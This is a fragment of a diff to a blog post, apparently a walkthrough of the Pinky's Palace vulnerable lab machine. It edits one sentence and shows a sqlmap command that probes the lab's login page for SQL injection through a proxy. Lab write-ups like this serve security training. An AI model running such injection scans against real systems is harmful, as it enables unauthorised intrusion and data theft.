limbernie/limbernie.github.io/_posts/2018-03-20-pinkys-palace-walkthrough.md

 >Note that also the HTTP `User-Agent` header is tested against SQL injection if the `--level` is set to 3 or above.

 Similarly, we need to set up proxy for `sqlmap` like we did for `dirbuster` in order to reach `pinkys-palace`.
-Armed with all the information that we've gathered so far, it's time to construct the `sqlmap` command like so.
+Armed with all the information that we've gathered so far, it's time to construct the `sqlmap` command.

 ```
 # sqlmap --level=3 --proxy=http://192.168.30.4:31337 --data="user=admin&pass=admin" --url=http://pinkys-palace:8080/littlesecrets-main/login.php